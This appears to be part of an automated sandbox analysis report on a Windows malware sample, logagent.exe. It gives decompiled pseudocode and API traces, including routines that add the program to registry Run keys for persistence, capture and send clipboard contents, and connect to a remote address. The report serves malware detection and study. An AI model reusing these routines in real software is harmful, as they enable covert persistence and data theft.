                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 00403801
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 0040380A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@2@@0@Hstd@@V01@@V10@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?data@?$basic_string@DriveTypeV01@_itoalstrlen
                                  • String ID:
                                  • API String ID: 3966177967-0
                                  • Opcode ID: 2ed17a773f70f2a2b96c76149902b1bc02ebe8e478459ea86c20583d4a86547d
                                  • Instruction ID: 4300f458e19456516dd56dc641f8d1b829b254aea369022c8032761b79b8ee60
                                  • Opcode Fuzzy Hash: 2ed17a773f70f2a2b96c76149902b1bc02ebe8e478459ea86c20583d4a86547d
                                  • Instruction Fuzzy Hash: B721ADB580060DEBCB05EBE0ED5DDDE777CAF54346B108025F912A3160EB746B49CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407D53 Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 82COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00407D53(void* __ecx, char _a4, char _a8, char _a12, char _a16) {
				char _v20;
				void* _t13;
				void* _t15;
				char* _t26;
				void* _t27;
				void* _t32;
				void* _t35;

				_t26 = "\"";
				if(_a4 == 1) {
					_t35 = _t27 - 0x10;
					L0041416A();
					L00414146();
					_t3 =  &_a16; // 0x415a24
					_t13 = E0040B7B9(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",  *_t3, _t35,  &_v20,  &_v20, _t26, 0x41ba28);
					_t27 = _t35 + 0x38;
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
				}
				if(_a8 == 1) {
					_t32 = _t27 - 0x10;
					L0041416A();
					L00414146();
					_t7 =  &_a16; // 0x415a24
					_t13 = E0040B7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",  *_t7, _t32,  &_v20,  &_v20, _t26, 0x41ba28);
					_t27 = _t32 + 0x38;
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
				}
				if(_a12 == 1) {
					L0041416A();
					L00414146();
					_t15 = E0040B7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _a16, _t27 - 0x10,  &_v20,  &_v20, _t26, 0x41ba28);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
					return _t15;
				}
				return _t13;
			}










                                  0x00407d60
                                  0x00407d6a
                                  0x00407d71
                                  0x00407d7a
                                  0x00407d84
                                  0x00407d8c
                                  0x00407d99
                                  0x00407d9e
                                  0x00407da4
                                  0x00407da4
                                  0x00407dae
                                  0x00407db5
                                  0x00407dbe
                                  0x00407dc8
                                  0x00407dd0
                                  0x00407ddd
                                  0x00407de2
                                  0x00407de8
                                  0x00407de8
                                  0x00407df2
                                  0x00407e02
                                  0x00407e0c
                                  0x00407e21
                                  0x00407e2c
                                  0x00000000
                                  0x00407e2c
                                  0x00407e36

                                  APIs
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24,?,00408003), ref: 00407D7A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe), ref: 00407DA4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24,?,00408003), ref: 00407D84
                                    • Part of subcall function 0040B7B9: RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 0040B7C6
                                    • Part of subcall function 0040B7B9: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00415628,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28), ref: 0040B7D5
                                    • Part of subcall function 0040B7B9: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28), ref: 0040B7E3
                                    • Part of subcall function 0040B7B9: RegSetValueExW.ADVAPI32(80000002,00407E26,00000000,?,00000000,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24), ref: 0040B7F6
                                    • Part of subcall function 0040B7B9: RegCloseKey.ADVAPI32(80000002,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28), ref: 0040B801
                                    • Part of subcall function 0040B7B9: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24), ref: 0040B810
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24), ref: 00407DBE
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24), ref: 00407DC8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe), ref: 00407DE8
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000001,00415628,0041BA28,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24), ref: 00407E02
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24), ref: 00407E0C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe), ref: 00407E2C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: G@std@@U?$char_traits@V?$allocator@$G@2@@0@G@2@@std@@Hstd@@V?$basic_string@$??1?$basic_string@$V10@V10@@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                  • String ID: $ZA$C:\Windows\SysWOW64\logagent.exe$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\
                                  • API String ID: 111787555-1532410975
                                  • Opcode ID: e235326932527ed2226d8983e4f804bb91d78ac99fb475050114bcfa4d032180
                                  • Instruction ID: d86c43b3a5ba32eb059a2cdc2ec90b1b4ffa6c8f934f2ed61d0225c93748e370
                                  • Opcode Fuzzy Hash: e235326932527ed2226d8983e4f804bb91d78ac99fb475050114bcfa4d032180
                                  • Instruction Fuzzy Hash: EE215A72D00114BBD710BAA69C4AEFB7F2CDF91354F440429F91962182E6BA8994C7E6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413C3F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 71windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E00413C3F(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct tagPOINT _v12;
				void* _t16;
				struct HMENU__* _t17;
				void* _t20;
				void* _t24;

				_t16 = _a8 - 1;
				if(_t16 == 0) {
					_t17 = CreatePopupMenu();
					 *0x41c1f0 = _t17;
					AppendMenuA(_t17, 0, 0, "Close");
					L15:
					return 0;
				}
				_t20 = _t16 - 0x110;
				if(_t20 == 0) {
					if(_a12 != 0) {
						goto L15;
					}
					Shell_NotifyIconA(2, 0x41c200);
					ExitProcess(0);
				}
				if(_t20 == 0x2f0) {
					_t24 = _a16 - 0x201;
					if(_t24 == 0) {
						if(IsWindowVisible( *0x41c1fc) == 0) {
							ShowWindow( *0x41c1fc, 9);
							SetForegroundWindow( *0x41c1fc);
						} else {
							ShowWindow( *0x41c1fc, 0);
						}
						goto L15;
					}
					if(_t24 == 3) {
						GetCursorPos( &_v12);
						SetForegroundWindow(_a4);
						TrackPopupMenu( *0x41c1f0, 0, _v12, _v12.y, 0, _a4, 0);
						goto L15;
					}
					_push(_a16);
					_push(_a12);
					_push(0x401);
					L4:
					return DefWindowProcA(_a4, ??, ??, ??);
				}
				_push(_a16);
				_push(_a12);
				_push(_a8);
				goto L4;
			}








                                  0x00413c47
                                  0x00413c48
                                  0x00413d1c
                                  0x00413d2c
                                  0x00413d31
                                  0x00413d37
                                  0x00000000
                                  0x00413d37
                                  0x00413c4e
                                  0x00413c53
                                  0x00413d03
                                  0x00000000
                                  0x00000000
                                  0x00413d0c
                                  0x00413d14
                                  0x00413d14
                                  0x00413c5e
                                  0x00413c7a
                                  0x00413c7f
                                  0x00413cd1
                                  0x00413ceb
                                  0x00413cf7
                                  0x00413cd3
                                  0x00413cdb
                                  0x00413cdb
                                  0x00000000
                                  0x00413cd1
                                  0x00413c84
                                  0x00413c97
                                  0x00413ca0
                                  0x00413cbb
                                  0x00000000
                                  0x00413cbb
                                  0x00413c86
                                  0x00413c89
                                  0x00413c8c
                                  0x00413c69
                                  0x00000000
                                  0x00413c6c
                                  0x00413c60
                                  0x00413c63
                                  0x00413c66
                                  0x00000000

                                  APIs
                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 00413C6C
                                  • GetCursorPos.USER32(?), ref: 00413C97
                                  • SetForegroundWindow.USER32(?), ref: 00413CA0
                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 00413CBB
                                  • Shell_NotifyIconA.SHELL32(00000002,0041C200), ref: 00413D0C
                                  • ExitProcess.KERNEL32 ref: 00413D14
                                  • CreatePopupMenu.USER32 ref: 00413D1C
                                  • AppendMenuA.USER32 ref: 00413D31
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                  • String ID: Close
                                  • API String ID: 1657328048-3535843008
                                  • Opcode ID: 9fa95a8da91032cbadd5b612f76443252f964982233fd8ca9fbdea8ba32e519c
                                  • Instruction ID: 3a9117e372e52b2e565462b42d507c4b1172ca251bbe850fbb6b863f13e0a9c7
                                  • Opcode Fuzzy Hash: 9fa95a8da91032cbadd5b612f76443252f964982233fd8ca9fbdea8ba32e519c
                                  • Instruction Fuzzy Hash: 3A210972180609FBDB115FA4ED0DBEA3F35FB08702F208021F606A51B1D7799AA0EB5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040E7F7 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 94COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040E91D
                                    • Part of subcall function 00402010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,0040E823,00000001,?,00000000), ref: 0040201E
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040E845
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                    • Part of subcall function 0041228F: GlobalMemoryStatusEx.KERNEL32(?), ref: 004122A0
                                    • Part of subcall function 0041230A: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,0041B320), ref: 0041231D
                                    • Part of subcall function 0041230A: GetProcAddress.KERNEL32(00000000), ref: 00412324
                                    • Part of subcall function 0041230A: Sleep.KERNEL32(000003E8,?,0041B320), ref: 0041233F
                                    • Part of subcall function 0041230A: __aulldiv.LIBCMT ref: 004123E4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000001,?,00000095), ref: 0040E87F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000008,?,00000000), ref: 0040E898
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000008,z@,00000000), ref: 0040E8AC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040E8B7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040E8C1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000096), ref: 0040E8DE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E8E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E8F0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E8F9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$D@1@@$D@2@@0@Hstd@@V01@@V10@0@V?$basic_string@$AddressGlobalHandleMemoryModuleProcSleepStatus__aulldivconnect
                                  • String ID: z@
                                  • API String ID: 1937136672-317290069
                                  • Opcode ID: d74b99179c0ec3edfaf413329de15268db7073bfc3635b63cbd5e7f7129ca5fd
                                  • Instruction ID: 66f006b43ec3188ac29da0c8503291dee518f3a81564da720cf043436550991c
                                  • Opcode Fuzzy Hash: d74b99179c0ec3edfaf413329de15268db7073bfc3635b63cbd5e7f7129ca5fd
                                  • Instruction Fuzzy Hash: E1318472C0010CEBDB01EBA1DD49EDEB778AB54305F00416AFA12A70D1EFB55B48CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1054FA22 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 82clipboardmemoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 65%
                                  			E1054FA22(intOrPtr* __ecx) {
				void* _t13;
				void* _t22;
				signed int _t23;
				void* _t24;
				void* _t33;
				struct HWND__* _t39;
				unsigned int _t50;
				signed int _t51;
				void* _t68;
				void* _t69;
				void* _t70;

				_push(_t39);
				_t13 =  *__ecx();
				_t77 = _t13;
				if(_t13 != 0) {
					EmptyClipboard();
					E1054319B(_t70 - 0x10, _t77, _t39);
					_t22 = GlobalAlloc(0x2000,  *0x4152e4() + 1);
					 *(_t70 + 8) = _t22;
					GlobalFix(_t22);
					 *(_t70 - 0x24) = _t22;
					_t23 = E1054319B(_t70 - 0x10, _t77, _t39);
					_t24 =  *0x415344();
					asm("repne scasb");
					_t50 =  !(_t23 | 0xffffffff);
					_t68 = _t24 - _t50;
					_t51 = _t50 >> 2;
					memcpy(_t68 + _t51 + _t51, _t68, memcpy( *(_t70 - 0x24), _t68, _t51 << 2) & 0x00000003);
					GlobalUnWire( *(_t70 + 8));
					SetClipboardData(1,  *(_t70 + 8));
					CloseClipboard();
					if(OpenClipboard(_t39) != 0) {
						_t33 = GetClipboardData(1);
						_t69 = _t33;
						GlobalFix(_t69);
						_t66 = _t33;
						GlobalUnWire(_t69);
						CloseClipboard();
						if(_t33 == _t39) {
							_t66 = 0x415664;
						}
						 *0x415318(_t70 - 0x25);
						E10543A51(0x41be70, 0x6b, _t66);
					}
				}
				E1054316C(_t70 - 0x10);
				 *0x415348();
				 *0x415348();
				return 0;
			}














                                  0x1054fa22
                                  0x1054fa23
                                  0x1054fa25
                                  0x1054fa27
                                  0x1054fa2d
                                  0x1054fa37
                                  0x1054fa4b
                                  0x1054fa52
                                  0x1054fa55
                                  0x1054fa5f
                                  0x1054fa62
                                  0x1054fa69
                                  0x1054fa79
                                  0x1054fa7b
                                  0x1054fa81
                                  0x1054fa86
                                  0x1054fa90
                                  0x1054fa92
                                  0x1054fa9d
                                  0x1054fab6
                                  0x1054fac5
                                  0x1054facd
                                  0x1054fad3
                                  0x1054fad6
                                  0x1054fadd
                                  0x1054fadf
                                  0x1054fae5
                                  0x1054faed
                                  0x1054faef
                                  0x1054faef
                                  0x1054fafe
                                  0x1054fb0b
                                  0x1054fb0b
                                  0x1054fac5
                                  0x10550033
                                  0x1055003b
                                  0x10550044
                                  0x10550050

                                  APIs
                                  • EmptyClipboard.USER32 ref: 1054FA2D
                                  • GlobalAlloc.KERNEL32(00002000,00000001), ref: 1054FA4B
                                  • GlobalFix.KERNEL32(00000000), ref: 1054FA55
                                  • GlobalUnWire.KERNEL32(?), ref: 1054FA92
                                  • SetClipboardData.USER32(00000001,?), ref: 1054FA9D
                                  • CloseClipboard.USER32 ref: 1054FAB6
                                  • OpenClipboard.USER32 ref: 1054FABD
                                  • GetClipboardData.USER32(00000001), ref: 1054FACD
                                  • GlobalFix.KERNEL32(00000000), ref: 1054FAD6
                                  • GlobalUnWire.KERNEL32(00000000), ref: 1054FADF
                                  • CloseClipboard.USER32 ref: 1054FAE5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Clipboard$Global$CloseDataWire$AllocEmptyOpen
                                  • String ID: dVA
                                  • API String ID: 4263304124-1571107130
                                  • Opcode ID: 1bb065fe989b23a641558362fa85ee87d19fbb2bc5e4e8c1d754e8d2f4c688a1
                                  • Instruction ID: 1d314066b2b0daa76572c3b27bd6c1bae32cb7c7e69ae64d1213680c89ba8cc8
                                  • Opcode Fuzzy Hash: 1bb065fe989b23a641558362fa85ee87d19fbb2bc5e4e8c1d754e8d2f4c688a1
                                  • Instruction Fuzzy Hash: 8B212D32610505DBDB04ABF4DC5DAEE3AA9EB88352B508429F917D71A0EB708944CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040BD9B Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 62COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00000004,?,0040BE54,?,?,00000004), ref: 0040BDAE
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKCU,?,?,00000004), ref: 0040BDC6
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE1E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE2B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@??8std@@D@2@@0@D@2@@std@@V?$basic_string@
                                  • String ID: HKCC$HKCR$HKCU$HKLM$HKU
                                  • API String ID: 2054586871-62392802
                                  • Opcode ID: a466e65ffd345a8b6a55af1eb436ab666088b088688f1f759b6253a5e0949071
                                  • Instruction ID: 2660231c1808b36434503ece8d2e95605cb547f4994df65369f224bebc220479
                                  • Opcode Fuzzy Hash: a466e65ffd345a8b6a55af1eb436ab666088b088688f1f759b6253a5e0949071
                                  • Instruction Fuzzy Hash: 8D01C43A58122AA2CE049AD0EC01ADA7708CF057B2F71007BAE04B76C0CB38D9854BCD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004121E8 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 51COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0040B5A2: RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040B5C3
                                    • Part of subcall function 0040B5A2: RegQueryValueExW.ADVAPI32(80000000,00412203,00000000,00000000,?,00000400), ref: 0040B5E2
                                    • Part of subcall function 0040B5A2: RegCloseKey.ADVAPI32(80000000), ref: 0040B5EB
                                    • Part of subcall function 0040B5A2: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 0040B60A
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(.exe,00000000,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412210
                                  • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000004,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412223
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 0041222D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412236
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00409BE6,?), ref: 0041224F
                                    • Part of subcall function 0041290A: ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,6DF7CB60,?,?,0041225E,?), ref: 00412919
                                    • Part of subcall function 0041290A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,0041225E,?), ref: 00412937
                                    • Part of subcall function 0041290A: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,0041225E,?), ref: 0041293F
                                    • Part of subcall function 0041290A: ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,0041225E,?), ref: 0041294A
                                    • Part of subcall function 0041290A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0041225E,?), ref: 00412954
                                    • Part of subcall function 0041290A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 0041295D
                                    • Part of subcall function 0041290A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 00412975
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00412265
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041226E
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0041227B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00412284
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@V01@@$??4?$basic_string@?find@?$basic_string@G@1@@V01@V12@$?length@?$basic_string@?replace@?$basic_string@?substr@?$basic_string@CloseOpenQueryValue
                                  • String ID: .exe$http\shell\open\command
                                  • API String ID: 2647146128-4091164470
                                  • Opcode ID: 252b6526ca8ce19ecb12a8c89719758da3f71089f7038446805540d7e0c89632
                                  • Instruction ID: d6ae35875aa51399811599ff5055279212e103e4be7b08956a6055bd29980306
                                  • Opcode Fuzzy Hash: 252b6526ca8ce19ecb12a8c89719758da3f71089f7038446805540d7e0c89632
                                  • Instruction Fuzzy Hash: F011127291061DEBCF04EBE0EC49FFD7738FB48304F544425F512A21A0DA74A148CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10552D58 Relevance: 18.3, APIs: 12, Instructions: 252COMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 10552D68
                                  • GetLastError.KERNEL32 ref: 10552DD1
                                  • malloc.MSVCRT ref: 10552DE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLastManagerOpenmalloc
                                  • String ID:
                                  • API String ID: 4129629542-0
                                  • Opcode ID: 7436737d771e6f94204cdcbc6dd436a297a8087e31d0d939b25b7b7780cd4931
